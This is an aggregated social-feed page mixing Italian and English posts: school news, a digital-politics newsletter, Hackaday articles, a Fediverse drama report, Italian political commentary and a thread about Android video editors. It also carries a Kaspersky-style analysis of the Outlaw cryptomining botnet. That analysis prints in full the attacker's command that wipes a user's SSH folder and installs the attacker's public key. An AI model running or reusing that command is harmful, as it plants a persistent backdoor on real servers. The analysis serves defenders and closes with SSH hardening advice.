Salta al contenuto principale



Sono stati firmati dal Ministro Giuseppe Valditara due decreti finalizzati all’attivazione dei percorsi di specializzazione sul sostegno previsti dal decreto legge 71 del 2024.


Il Ministro Giuseppe Valditara ha inviato alle scuole una circolare relativa alla programmazione delle verifiche in classe e all’assegnazione dei compiti da svolgere a casa.

Qui tutti i dettagli ▶️ mim.gov.

Poliverso & Poliversity reshared this.



#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.



Il fondatore di WikiLeaks, Julian Assange, ha reso un sentito omaggio a Papa Francesco in occasione delle sue esequie, manifestando rispetto e gratitudine per il Pontefice che, nel corso degli anni, si è interessato alla sua vicenda.


The limits of misinformation: Canada election edition


The limits of misinformation: Canada election edition
HOWDY GANG. THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be in Brussels this week to interview Microsoft's president Brad Smith. You can watch along here on April 30, or put your name down here for one of the final in-person spots.

In other news, I was also just appointed as a member of an independent committee at the United Kingdom's Ofcom regulator to advise on issues related to the online information environment. More on that here.

— Canadians go to the polls on April 28 amid a barrage of online falsehoods. That won't stop Liberal leader Mark Carney almost certainly winning.

— There's a lot of politics to unpack behind the European Union's collective $790 million antitrust fine against Meta and Apple related to the bloc's new competition rules.

— Brussels spent $52 million in 2024 to implement its online safety regime. Those figures will rise by more than a quarter this year.

Let's get started:



digitalpolitics.co/newsletter0…



Outlaw cybergang attacking targets worldwide



Introduction


In a recent incident response case in Brazil, we dealt with a relatively simple, yet very effective threat focused on Linux environments. Outlaw (also known as “Dota”) is a Perl-based crypto mining botnet that typically takes advantage of weak or default SSH credentials for its operations. Previous research ([1], [2]) described Outlaw samples obtained from honeypots. In this article, we provide details from a real incident contained by Kaspersky, as well as publicly available telemetry data about the countries and territories most frequently targeted by the threat actor. Finally, we provide TTPs and best practices that security practitioners can adopt to protect their infrastructures against this type of threat.

Analysis


We started the analysis by gathering relevant evidence from a compromised Linux system. We identified an odd authorized SSH key for a user called suporte (in a Portuguese-speaking environment, this is an account typically used for administrative tasks in the operating system). Such accounts are often configured to have the same username as the password, which is a bad practice, making it easy for the attackers to exploit them. The authorized key belonged to a remote Linux machine user called mdrfckr, a string found in Dota campaigns, which raised our suspicion.

Suspicious authorized key
Suspicious authorized key

After the initial SSH compromise, the threat actor downloads the first-stage script, tddwrt7s.sh, using utilities like wget or curl. This artifact is responsible for downloading the dota.tar.gz file from the attackers’ server. Below is the sequence of commands performed by the attacker to obtain and decompress this file, which is rather typical of them. It is interesting to note that the adversary uses both of the previously mentioned utilities to try to download the artifact, since the system may not have one or another.

Chain of commands used by the attackers to download and decompress dota.tar.gz
Chain of commands used by the attackers to download and decompress dota.tar.gz

After the decompression, a hidden directory, named ".configrc5", was created in the user’s home directory with the following structure:

.configrc5 directory structure
.configrc5 directory structure

Interestingly enough, one of the first execution steps is checking if other known miners are present on the machine using the script a/init0. If any miners are found, the script tries to kill and block their execution. One reason for this is to avoid possible overuse of the RAM and CPU on the target machine.

Routine for killing and blocking known miners
Routine for killing and blocking known miners

The script also monitors running processes, identifies any that use 40% or more CPU by executing the command ps axf-o"pid %cpu", and for each such process, checks its command line (/proc/$procid/cmdline) for keywords like "kswapd0","tsm","rsync","tor","httpd","blitz", or "mass" using the grep command. If none of these keywords are found ( grep doesn’t return zero), the process is forcefully killed with the kill-9 command; otherwise, the script prints "don't kill", effectively whitelisting Outlaw’s known or expected high-CPU processes, so it doesn’t accidentally kill them.

Processes checks performed by the threat
Processes checks performed by the threat

After the process checks and killing are done, the b/run file is executed, which is responsible for maintaining persistence on the infected machine and executing next-stage malware from its code. For persistence purposes, the attackers used the following command to wipe the existing SSH setup, create a clean .ssh folder, add a new public key for SSH access, and lock down permissions.
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh
The next-stage malware is a Base64-encoded string inside the b/run script that, once decoded, reveals another level of obfuscation: this time an obfuscated Perl script. Interestingly, the attackers left a comment generated by the obfuscator (perlobfuscator.com) in place.

Obfuscated Perl script
Obfuscated Perl script

We were able to easily deobfuscate the code using an open-source script available on the same website as used by the attackers (perlobfuscator.com/decode-stun…), which led us to the original source code containing a few words in Portuguese.

Deobfuscated Perl script
Deobfuscated Perl script

This Perl script is an IRC-based botnet client that acts as a backdoor on a compromised system. Upon execution, it disguises itself as an rsync process, creates a copy of itself in the background, and ignores termination signals. By default, it connects to a hardcoded IRC server over port 443 using randomly generated nicknames, joining predefined channels to await commands from designated administrators. The bot supports a range of malicious features including command execution, DDoS attacks, port scans, file download, and upload via HTTP. This provides the attackers with a wide range of capabilities to command and control the botnet.

XMRig miner


Another file from the hidden directory, a/kswapd0, is an ELF packed using UPX, as shown in the image below. We were able to easily unpack the binary for analysis.

kswapd0 identification and unpacking
kswapd0 identification and unpacking

By querying the hash on threat intelligence portals and by statically analyzing the sample, it became clear that this binary is a malicious modified version of XMRig (6.19.0), a cryptocurrency miner.

XMRig version
XMRig version

We also found a configuration file embedded in the binary. This file contains the attacker’s mining information. In our scenario, the configuration was set up to mine Monero using the CPU only, with both OpenCL and CUDA (for GPU mining) disabled. The miner runs in the background, configured for high CPU usage. It also connects to multiple mining pools, including one accessible via Tor, which explains the presence of Tor files inside the .configrc5/a directory. The image below shows an excerpt from this configuration file.

XMRig custom configuration
XMRig custom configuration

Victims


Through telemetry data collected from public feeds, we have identified victims of the Outlaw gang mainly in the United States, but also in Germany, Italy, Thailand, Singapore, Taiwan, Canada and Brazil, as shown in the chart below.

Countries and territories where Outlaw is most active< (download)

The following chart shows the distribution of recent victims. We can see that the group was idle from December 2024 through February 2025, then a spike in the number of victims was observed in March 2025.

Number of Outlaw victims by month, September 2024–March 2025 (download)

Recommendations


Since Outlaw exploits weak or default SSH passwords, we recommend that system administrators adopt a proactive approach to hardening their servers. This can be achieved through custom server configurations and by keeping services up to date. Even simple practices, such as using key-based authentication, can be highly effective. However, the /etc/ssh/sshd_config file allows for the use of several additional parameters to improve security. Some general configurations include:

  • Port <custom_port_number>: changes the default SSH port to reduce exposure to automated scans.
  • Protocol 2: enforces the use of the more secure protocol version.
  • PermitRootLogin no: disables direct login as the root user.
  • MaxAuthTries <integer>: limits the number of authentication attempts per session.
  • LoginGraceTime <time>: defines the amount of time allowed to complete the login process (in seconds unless specified otherwise).
  • PasswordAuthentication no: disables password-based login.
  • PermitEmptyPasswords no: prevents login with empty passwords.
  • X11Forwarding no: disables X11 forwarding (used for running graphical applications remotely).
  • PermitUserEnvironment no: prevents users from passing environment variables.
  • Banner /etc/ssh/custom_banner: customizes the system login banner.

Consider disabling unused authentication protocols:

  • ChallengeResponseAuthentication no
  • KerberosAuthentication no
  • GSSAPIAuthentication no

Disable tunneling options to prevent misuse of the SSH tunnel feature:

  • AllowAgentForwarding no
  • AllowTcpForwarding no
  • PermitTunnel no

You can limit SSH access to specific IPs or networks using the AllowUsers directive:

  • AllowUsers *@10.10.10.217
  • AllowUsers *@192.168.0.0/24

Enable public key authentication with:

  • PubkeyAuthentication yes

Set parameters to automatically disconnect idle sessions:

  • ClientAliveInterval <time>
  • ClientAliveCountMax <integer>

The following configuration file serves as a template for hardening the SSH service:
Protocol 2
Port 2222

LoginGraceTime 10
PermitRootLogin no
MaxAuthTries 3
IgnoreRhosts yes
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no

UsePAM yes
ChallengeResponseAuthentication no
KerberosAuthentication no
GSSAPIAuthentication no

AllowAgentForwarding no
AllowTcpForwarding no
X11Forwarding no
PrintMotd no
PrintLastLog yes
PermitUserEnvironment no
ClientAliveInterval 300
ClientAliveCountMax 2
PermitTunnel no

Banner /etc/ssh/custom_banner
AllowUsers *@10.10.10.217
While outside sshd_config, pairing your config with tools like Fail2Ban or firewalld rate limiting adds another solid layer of protection against brute force.

Conclusion


By focusing on weak or default SSH credentials, Outlaw keeps improving and broadening its Linux-focused toolkit. The group uses a range of evasion strategies, such as concealing files and folders or obfuscated programs, and uses compromised SSH keys to keep access for as long as possible. The IRC-based botnet client facilitates a wide range of harmful operations, such as command execution, flooding, and scanning, while the deployment of customized XMRig miners can divert processing resources to cryptocurrency mining. By hardening SSH configurations (for instance, turning off password authentication), keeping an eye out for questionable processes, and limiting SSH access to trustworthy users and networks, system administrators can greatly lessen this hazard.

Tactics, techniques and procedures


Below are the Outlaw TTPs identified from our malware analysis.

TacticTechniqueID
ExecutionCommand and Scripting Interpreter: Unix ShellT1059.004
PersistenceScheduled Task/Job: CronT1053.003
PersistenceAccount Manipulation: SSH Authorized KeysT1098.004
Defense EvasionObfuscated Files or InformationT1027
Defense EvasionIndicator Removal: File DeletionT1070.004
Defense EvasionFile and Directory Permissions ModificationT1222
Defense EvasionHide Artifacts: Hidden Files and DirectoriesT1564.001
Defense EvasionObfuscated Files or Information: Software PackingT1027.002
Credential AccessBrute ForceT1110
DiscoverySystem Information DiscoveryT1082
DiscoveryProcess DiscoveryT1057
DiscoveryAccount DiscoveryT1087
DiscoverySystem Owner/User DiscoveryT1033
DiscoverySystem Network Connections DiscoveryT1049
Lateral MovementRemote Services: SSHT1021.004
CollectionData from Local SystemT1005
Command and ControlApplication Layer ProtocolT1071
Command and ControlIngress Tool TransferT1105
ExfiltrationExfiltration Over Alternative ProtocolT1048
ImpactResource HijackingT1496
ImpactService StopT1489

Indicators of Compromise



securelist.com/outlaw-botnet/1…

Maronno Winchester reshared this.



Crossing Commodore Signal Cables on Purpose


On a Commodore 64, the computer is normally connected to a monitor with one composite video cable and to an audio device with a second, identical (although uniquely colored) cable. The signals passed through these cables are analog, each generated by a dedicated chip on the computer. Many C64 users may have accidentally swapped these cables when first setting up their machines, but [Matthias] wondered if this could be done purposefully — generating video with the audio hardware and vice versa.

Getting an audio signal from the video hardware on the Commodore is simple enough. The chips here operate at well over the needed frequency for even the best audio equipment, so it’s a relatively straightforward matter of generating an appropriate output wave. The audio hardware, on the other hand, is much less performative by comparison. The only component here capable of generating a fast enough signal to be understood by display hardware of the time is actually the volume register, although due to a filter on the chip the output is always going to be a bit blurred. But this setup is good enough to generate large text and some other features as well.

There are a few other constraints here as well, namely that loading the demos that [Matthias] has written takes so long that the audio can’t be paused while this happens and has to be bit-banged the entire time. It’s an in-depth project that shows mastery of the retro hardware, and for some other C64 demos take a look at this one which is written in just 256 bytes.

youtube.com/embed/_Orvsms7Ils?…

Thanks to [Jan] for the tip!


hackaday.com/2025/04/29/crossi…



Read Motor Speed Better By Making The RP2040 PIO Do It


A quadrature encoder provides a way to let hardware read movement (and direction) of a shaft, and they can be simple, effective, and inexpensive devices. But [Paulo Marques] observed that when it comes to reading motor speeds with them, what works best at high speeds doesn’t work at low speeds, and vice versa. His solution? PicoEncoder is a library providing a lightweight and robust method of using the Programmable I/O (PIO) hardware on the RP2040 to get better results, even (or especially) from cheap encoders, and do it efficiently.
The results of the sub-step method (blue) resemble a low-pass filter, but is delivered with no delay or CPU burden.
The output of a quadrature encoder is typically two square waves that are out of phase with one another. This data says whether a shaft is moving, and in what direction. When used to measure something like a motor shaft, one can also estimate rotation speed. Count how many steps come from the encoder over a period of time, and use that as the basis to calculate something like revolutions per minute.

[Paulo] points out that one issue with this basic method is that the quality depends a lot on how much data one has to work with. But the slower a motor turns, the less data one gets. To work around this, one can use a different calculation optimized for low speeds, but there’s really no single solution that handles high and low speeds well.

Another issue is that readings at the “edges” of step transitions can have a lot of noise. This can be ignored and assumed to average out, but it’s a source of inaccuracy that gets worse at slower speeds. Finally, while an ideal encoder has individual phases that are exactly 50% duty cycle and exactly 90 degrees out of phase with one another. This is almost never actually the case with cheaper encoders. Again, a source of inaccuracy.

[Paulo]’s solution was to roll his own method with the RP2040’s PIO, using a hybrid approach to effect a “sub-step” quadrature encoder. Compared to simple step counting, PicoEncoder more carefully tracks transitions to avoid problems with noise, and even accounts for phase size differences present in a particular encoder. The result is a much more accurate calculation of motor speed and position without any delays. Most of the work is done by the PIO of the RP2040, which does the low-level work of counting steps and tracking transitions without any CPU time involved. Try it out the next time you need to read a quadrature encoder for a motor!

The PIO is one of the more interesting pieces of functionality in the RP2040 and it’s great to see it used in a such a clever way. As our own Elliot Williams put it when he evaluated the RP2040, the PIO promises never having to bit-bang a solution again.


hackaday.com/2025/04/29/read-m…



There’s A Venusian Spacecraft Coming Our Way


It’s not unusual for redundant satellites, rocket stages, or other spacecraft to re-enter the earth’s atmosphere. Usually they pass unnoticed or generate a spectacular light show, and very rarely a few pieces make it to the surface of the planet. Coming up though is something entirely different, a re-entry of a redundant craft in which the object in question might make it to the ground intact. To find out more about the story we have to travel back to the early 1970s, and Kosmos-482. It was a failed Soviet Venera mission, and since its lander was heavily over-engineered to survive entry into the Venusian atmosphere there’s a fascinating prospect that it might survive Earth re-entry.
A model of the Venera 7 probe, launched in 1970.This model of the earlier Venera 7 probe shows the heavy protection to survive entry into the Venusian atmosphere. Emerezhko, CC BY-SA 4.0.
At the time of writing the re-entry is expected to happen on the 10th of May, but as yet due to its shallow re-entry angle it is difficult to predict where it might land. It is thought to be about a metre across and to weigh just under 500 kilograms, and its speed upon landing is projected to be between 60 and 80 metres per second. Should it hit land rather than water then, its remains are thought to present an immediate hazard only in its direct path.

Were it to be recovered it would be a fascinating artifact of the Space Race, and once the inevitable question of its ownership was resolved — do marine salvage laws apply in space? –we’d expect it to become a world class museum exhibit. If that happens, we look forward to bringing you our report if possible.

This craft isn’t the only surviving relic of the Space Race out there, though it may be the only one we have a chance of seeing up-close. Some of the craft from that era are even still alive.

Header: Moini, CC0.


hackaday.com/2025/04/29/theres…



Instance drama, with some reflection on how federation could be improved on the fediverse.


Fediverse Report – #114

Posts made by a Fosstodon server moderator on Reddit has caused some drama, leading to both Fosstodon admins to call it quits, a number of servers (threatening to) defederate from the Fosstodon server, leading to an uncertain future for the Fosstodon server.

Fosstodon drama


A few days ago someone published a post on Mastodon, with screenshots and links to posts made on Reddit by one of the Fosstodon moderators. In the linked posts, the Reddit account in question, which seemingly belongs to the Fosstodon moderator, holds various right-wing beliefs, ranging from defending the deportation of Mahmoud Khalil to claiming Democrat supporters are in a cult. Backlash to the Fosstodon server was swift and strong, with various calls and plans from other servers to defederate from Fosstodon, members of the Fosstodon server looking for other servers to move their account to, and a general condemnation from the wider community. Both Fosstodon admins have posted articles declaring they are stepping down, citing not only the current drama as a reason, but that they see the work of being server admins as frustrating with little pay-off. One Fosstodon community member is considering to take over the administration of the server, though as of writing, that process is still ongoing and the outcome unclear.

Some thoughts and takeaways about what this drama says about the social side of federation on the network, and how different communities interact:

When a server moderators holds opinions other people view as problematic, the social cost of these views is partially extended to server users as well. See for example the account for fediverse streaming platform Owncast, which has an account on the Fosstodon server. Owncast says that they are getting messages that say they need to move servers, otherwise people will see them as Nazis. This blog post about another Fosstodon user explains a similar thought process, where it is rational for them to move to a different server, because they will be associated with the politics of the server moderator in question otherwise.

This behaviour has an impact on how people on the fediverse should find an instance they want to join. It turns out that knowing the political affiliations of server moderators is important, and that this is something that people should know about before joining a server. People will be judged for being on a server that has a moderator with toxic political views. As such, it becomes important for people to know this information beforehand: both that they will get judged for the politics of server moderators, as well as knowing what those political views actually are.

This is another indication of why the process of selecting a server when someone joins the fediverse is actually a challenge: important information that should impact server choice is not made available to users, nor is it made clear that this information is important in the first place.

The second takeaway from the situation is that it shows a need for fediverse servers to have a federation policy. How federation currently works on the fediverse is that servers are connected with each other by default, and the assumption is that servers can disconnect from each other for any reason, but will mostly do so only if one of the servers is misbehaving in some way. Freedom of association is one of the valuable features of the fediv erse. Server operators should be free to defederate from any other server, for any reason. Being able to defederate from another server because you strongly disagree with the politics from one of the server moderators is a good thing. But if this is a consistent policy of the server, it would do well to make this policy public and explicit. Servers defederating from each other can have significant impact on users, who suddenly can lose connections with their friends. A policy of defederating from other servers based on the expressed beliefs of server moderators is something that is not immediately obvious to new people joining the fediverse. There are absolutely valid reasons to do so, but it seems to me that formalising such a policy would be a good step towards making the culture on the fediverse more sustainable.

The third takeaway is that running a fediverse server is challenging, especially over longer periods of time. Both Fosstodon admins have called in quits in response to the most recent drama. Their blog posts explaining their perspectives is that this has been a long time coming, and that the Fosstodon server has been uncompensated work that they do not love doing for years now. Regardless of one’s perspective on how the admins handled the latest situation, it is a further indication that being a fediverse server admin is a challenging job, one that should not be expected that someone can do forever. This means that servers like Fosstodon need governance systems that allow for better and earlier rotation of administrative power. Fediverse software should also be better at dealing with the realities of admin burnout. The users who are transferring from Fosstodon to another server will lose their posts; Mastodon does only transfer the social graph, and not posting history. While ideally the majority of servers would have extensive governance systems in place that can help deal with admin burnout, the reality is that most servers do not. More fediverse software should provide better support for users having to move to different servers, including with their posts.

The Links


  • NLnet, a fund that contributes to many open-source initiatives with a long track record of support fediverse projects, has published the beneficiaries of their latest funding round. PeerTube has gotten another grant, and publisher Framasoft talked about more how the money will be spend in their 2025 roadmap. The other fediverse beneficiary is an OpenScience flavour of Bonfire. Bonfire is an upcoming fediverse platform with a broad range of features, but the platform has struggled to get to an actual release. Bonfire published a blog post about their ‘road to Bonfire 1.0’ in September 2023, and an update in October 2024 where they announced a bounty program to get contributions to improve performance of the app.
  • Flipboard uploaded more videos from last months Fediverse House event at SXSW on their PeerTube channel, including an interview with Cory Doctorow and a demo of the Surf app.
  • The Doo the Woo podcast, hosted by WordPress ActivityPub plugin developer Matthias Pfefferle, interviewed André Menrath. Menrath is working on a plugin to bring WordPress events to ActivityPub.
  • The Bad Space is a project where various fediverse servers share their blocklists to build an aggregate of fediverse servers that are potentially worth blocking. The project is now available for self-hosting.
  • Some new features for FediAlgo, a customisable timeline algorithm for Mastodon, including a ‘What’s Trending’ feature.
  • A writeup on how to make a blog site using Lemmy as data storage.
  • This week’s fediverse software updates.

That’s all for this week, thanks for reading! You can subscribe to my newsletter to get all my weekly updates via email, which gets you some interesting extra analysis as a bonus, that is not posted here on the website. You can subscribe below:

#fediverse

fediversereport.com/fediverse-…




SIRIA. Dopo gli alawiti, ora sotto attacco sono i drusi. E Israele sfrutta l’occasione


@Notizie dall'Italia e dal mondo
Oltre 22 morti a Jaramana, città a maggioranza drusa attaccata da miliziani delle nuove autorità di Damasco, e in altre località. Tra le vittime anche militari governativi Israele intanto bombarda "in difesa dei drusi" e porta avanti i



Governance di Internet, l’Icann lancia l’allarme: “La rete globale è a rischio”

Al Wsis+20 si decide il futuro della rete: il modello multistakeholder minacciato da nuove spinte stataliste. L’Internet Corporation for Assigned Names and Numbers avverte: senza un “governo” inclusivo si andrebbe verso la frammentazione e il controllo geopolitico

corrierecomunicazioni.it/telco…

@Politica interna, europea e internazionale

reshared this




la corea del nord penso sia forse l'unico paese del mondo dove il turista invece di portare ricchezza consuma ricchezza... penso sia il motivo per cui ne autorizzano pochi (ma buoni, per loro).



Fragilità


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/fragilit…
No, non è Frittole, non è il millequattrocento - quasi millecinque, ma ci assomiglia molto e, mio malgrado, posso dire "io c'ero". Forse mi sto ripetendo perché cito spesso "non ci resta che piangere" ma non trovo nulla di più adatto. Tornando da una lunga…

Privacy Pride reshared this.



con trump si può dire come minimo che gli usa sono diventati un interlocutore inaffidabile per chiunque


SIRIA. Dopo gli alawiti, ora sotto attacco sono i drusi


@Notizie dall'Italia e dal mondo
Almeno 14 i morti a Jaramana, città a maggioranza drusa attaccata da miliziani delle nuove autorità di Damasco.
L'articolo SIRIA. Dopo gli alawiti, ora sotto attacco sono i drusi proviene da pagineesteri.it/2025/04/30/med…



FLOSS video editor for Android?

Recently I had a class (at the school of art-therapy I'm currently attending) in the basics of video editing, and of course they had us use Capcut... (for those of you who don't know, it's TikTok's official app, full of AI stuff, social media optimizations, premium features etc...)
I've been doing video editing on Linux since 2020 (using Cinelerra-GG), but after this class I've been looking for some "real" (i.e., as close as possible) FLOSS alternative (but w/o all the AI and the bloat) to introduce my colleagues to.
I know about desktop alternatives, but here I want to focus on mobile apps (at least on Android).
Initially, I really thought there was none (Open Video Editor is of no use here), and the best option would be something like CuteCut, which isn't open source but at least has 0 trackers according to Exodus.
Then I stumbled upon LibreCuts.
It really seems to be what I'm looking for... except, then I read that it depends on Android Studio and Android SDK. I'm not totally sure what this actually means - is it still in an early phase of development and it will eventually be available as a "normal" app in the store? And in the meantime, what should I do to try it on my phone?
I'm tagging @TOV as I reckon they would have some useful insight for me, but anyone who knows better than me please help.
I wonder if this may also interest @Daniel Supernault for a collab/integration for the Loops platform?
@Signor Amministratore ⁂ @Devol ⁂

Questa voce è stata modificata (4 mesi fa)
in reply to Tiziano :friendica:

I tried to discover a workflow for editing videos on Android a long time ago and had no success. Most video editors on mobile devices are limited. Perhaps this limitation is due to the limited processing power mobile devices offer. Because desktop processors have higher clock speeds and fewer power restrictions than mobile devices, applications like 2D and 3D animation, photo editing and video editing are better done on desktop computers.
in reply to TOV

@TOV
Thank you for the reply! Well, this is my opinion, too, but what I'm saying here is that the average users wanting to make a simple, quick edit for whatever reason (from reels to post on social networks, to therapeutical activity, like in my case), really don't care about power or screen size, they just need some app on their phone to edit on the go.
This is why I was looking for an alternative, because many people really appreciate CapCut for this reason, so I think it would be nice to have something else to offer them.
@TOV
Questa voce è stata modificata (4 mesi fa)
in reply to Tiziano :friendica:

I would be interested in finding an open source video editor for Android too.
in reply to TOV

@TOV
Well, I really wonder whether @Daniel Supernault has any ideas or plans about this (I know he's very busy with all of his projects at the moment, but maybe for the future...). I think this would be much appreciated by #pixelfed and #loops users (CapCut was created for TikTok users after all) 😉
in reply to Tiziano :friendica:

This page is very interesting. According to Google, a video editing application can be implemented using Kotlin or Java.
developer.android.com/media/im…
Questa voce è stata modificata (4 mesi fa)
in reply to TOV

Unfortunately, I will admit that I prefer writing Python code using the Qt framework.


Perché Zuckerberg ha lanciato una app Meta Ai per iOS e Android?

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Menlo Park sfodera l'app Meta Ai compatibile con gli occhiali intelligenti realizzati dal gruppo. Chiara l'intenzione di presidiare tutti gli ambiti utili a potenziare e sfamare i propri algoritmi: via



🚩ATTENZIONE🚩: il 2 maggio è prevista la migrazione di Pixelfed.uno su un nuovo server dedicato![i]

Venerdì 2 maggio, l'istanza Pixelfed.uno verrà spostata su un server più veloce e capiente per sostenere la sua recente crescita(sono stati superati i 500GB di immagini condivise!).

[b]⚠️ Cosa aspettarsi:
- Interruzioni durante i lavori (il sito sarà offline alcune ore).
- Nessun dato perso: tutte le foto e i profili saranno al sicuro!

Perché la migrazione?
🚀 Pixelfed.uno è la prima istanza italiana pixelfed e la prima consigliata dopo quella ufficiale: pixelfed.org/servers e c'è l'intenzione di mantenerla veloce, gratuita e senza pubblicità

🔗 Aggiornamenti in tempo reale su mastodon.uno/@pixelfed

@Che succede nel Fediverso?



Selçuk Kozağaçlı: Un Simbolo della Resistenza Legale sotto il Regime di Erdoğan


@Notizie dall'Italia e dal mondo
L'ex presidente dell’Associazione degli Avvocati Progressisti (ÇHD) è stato scarcerato dopo otto anni di prigione. Ma solo un giorno dopo, lo stesso tribunale che aveva approvato la sua liberazione ha emesso un nuovo mandato di arresto. La sua



Ucraina. Il bastone e la carota di Mosca spazientiscono Trump


@Notizie dall'Italia e dal mondo
Putin offre una tregua ma martella le linee e le città ucraine, confermando le rivendicazioni territoriali e il no all'ingresso di Kiev nella Nato. La strategia di Trump mostra i suoi limiti
L'articolo Ucraina. Il bastone e la carota di Mosca spazientiscono Trump pagineesteri.it/2025/04/30/mon…




Bisogna avere la faccia come il sedere per dire determinate cose. Io non so che posizione abbiano tutti gli altri cittadini europei, ma quelli italiani in larga maggioranza sono contrari ai piani di riarmo guerrafondai di Ursula Von der Leyen.
Questa naista dei giorni nostri continua a mentire spudoratamente. Il discorso che ha fatto oggi al congresso del Partito Popolare Europeo sembrava scopiazzato dagli appunti di Hitler a cavallo tra la prima e la seconda guerra mondiale: dobbiamo riarmarci, dobbiamo difenderci, ci vogliono invadere, non bisogna cedere alla diplomazia.
Servono armi e guerra per fare la pace. Non sto scherzando! Questa na
ista del nuovo secolo, sappiatelo, è a capo dell'Unione Europea grazie a personaggi come Giorgia Meloni ed Elly Schlein.

Questa na*ista del nuovo secolo parla di diritto di difendersi ma non dice una sola parola sulla difesa dei Palestinesi contro i terroristi isrl.

GiuseppeSalamone



L'intelligenza artificiale ha ingannato gli utenti di Reddit

Un esperimento “non autorizzato”, condotto dall'Università di Zurigo, ha riempito un subreddit di commenti generati dall'AI

Aspre polemiche sul fatto che i ricercatori dell'Università di Zurigo lo abbiano condotto di nascosto, senza informare i moderatori del subreddit: "L'abbiamo fatto a fin di bene!". Ma Reddit valuta azioni legali.

wired.it/article/intelligenza-…

@Etica Digitale (Feddit)

reshared this



Ecco quanto è complicato il nostro lavoro. mi riferisco agli informatici.

Ed ecco perché metterci sotto pressione, sottopagati, con carenze di organico strutturali non è mai una buona idea.

Poi, magari le cause del problema non sono state queste ma voglio puntare il dito sul fatto che ormai tutto è informatizzato, anche in sistemi critici. È in questo contesto che va inserito il mio discorso; l'articolo è solo uno spunto.

ilsole24ore.com/art/blackout-s…



Effetto #Trump: #Canada ai liberali


altrenotizie.org/primo-piano/1…


Tra Italia e Turchia un’alleanza industriale nel segno della pragmaticità. Intervista a Cossiga (Aiad)

@Notizie dall'Italia e dal mondo

Nel cuore del Mediterraneo, Italia e Turchia stanno ridefinendo il panorama della cooperazione industriale nel settore della difesa. A margine degli incontri a Roma, che hanno visto la firma di accordi strategici tra i



La Germania riarmata, le spese a debito e il nodo sui fondi di coesione europei. Intervista a Nelli Feroci (Iai)

@Notizie dall'Italia e dal mondo

È ufficiale: la Germania sarà il primo Paese europeo a richiedere formalmente lo scorporo delle spese per la Difesa dai parametri sul debito previsti dal Patto di stabilità. Dopo ottant’anni di politiche in senso opposto, Berlino intende




Berlino si smarca dal Patto di stabilità e accelera sulla Difesa europea. E l’Italia? Scrive Volpi

@Notizie dall'Italia e dal mondo

La Germania è il primo Paese europeo ad avvalersi della possibilità di escludere dal calcolo del Patto di Stabilità le spese militari, nell’ambito del programma ReArm Europe lanciato per rafforzare le capacità di difesa



22 carabinieri sono stati condannati per le violenze compiute in caserma ad Aulla, in provincia di Massa-Carrara


I carabinieri sono accusati a vario titolo di lesioni, violenza sessuale, abuso d’ufficio, falso in atto pubblico, porto abusivo d’armi e rifiuto di denuncia: la pena più grave, di 9 anni e 8 mesi, è stata inflitta al maresciallo Alessandro Fiorentino.

I magistrati hanno anche fatto delle intercettazioni telefoniche.

In una di queste intercettazioni, uno dei carabinieri raccomandava a un collega di non parlare a nessuno di quello che accadeva in caserma: «Da questa caserma non deve uscire niente, dobbiamo essere come la mafia», diceva.

ilpost.it/2025/04/29/carabinie…



Chi vuole escludere l’Italia dalla difesa Ue? La versione di Donazzan

@Notizie dall'Italia e dal mondo

Gli eurodeputati italiani di FI e FdI si sono schierati contro la vulgata che vorrebbe i fondi della difesa dedicati solo ad aziende che hanno una catena di fornitura made in Eu, decisione che di fatto discriminerebbe tutte quelle realtà industriali che hanno relazioni con Usa,



La storia di una straordinaria stamperia: il 9 e il 10 maggio, al Centro Culturale LA CAMERA VERDE (Ostiense, via G. Miani 20), si proietta il documentario "IL LABORATORIO", di Pasquale Napolitano (scrittura del regista e di Daniela Allocca).

>>> Vittorio Avella, maestro incisore, e Antonio Sgambati nel 1978 a Nola, fondano Il Laboratorio di Nola. 45 anni di attività segnano questo luogo come tra gli ultimi avamposti dove il libro non è mai stato una questione di codici a barre. Il libro nel laboratorio diventa un’esperienza umana. Il film di Napolitano racconta l’idea, la gioia del fare, del saper aspettare, cosa accade quando il torchio si mette in movimento, cosa vuol dire tirare su una stamperia ... <<<

slowforward.net/2025/04/28/9-1…



weird googly flarfy texts by me from time to time.
one is here now:
differx.blogspot.com/2025/04/t…

(it's the kind of texts Jim Leftwich and I liked to send each other. I miss his friendship and talks and his pages A LOT).



L’UE non raggiungerà i propri obiettivi di produzione di chip per il 2030, dicono i revisori dei conti

L'articolo proviene da #Euractiv Italia ed è stato ricondiviso sulla comunità Lemmy @Intelligenza Artificiale
È improbabile che l’UE si avvicini all’obiettivo di conquistare una quota del 20% nella produzione mondiale di

reshared this



Kashmir: quinta notte di scontri al confine tra Pakistan e India


@Notizie dall'Italia e dal mondo
Proseguono gli scontri in Kashmir tra i militari dell'India e del Pakistan dopo la strage che ha ucciso 26 turisti nella regione occupata da Nuova Delhi
L'articolo Kashmir: quinta notte di scontri al confine tra Pakistan e India pagineesteri.it/2025/04/29/asi…



siamo una strana categoria


domani, mercoledì 30 aprile, a San Giovanni, Teatro Basilica: lettura collettiva delle poesie del libro (recentemente ristampato in ebook gratuitamente scaricabile) “Strana categoria”, di Carlo Bordini.
slowforward.net/2025/04/24/30-…

per leggere il libro: slowforward.net/2025/04/24/car…

#poesia #carlobordini #teatrobasilica #lettura #reading



Lo scammer che sussurrava all’unicorno


@Privacy Pride
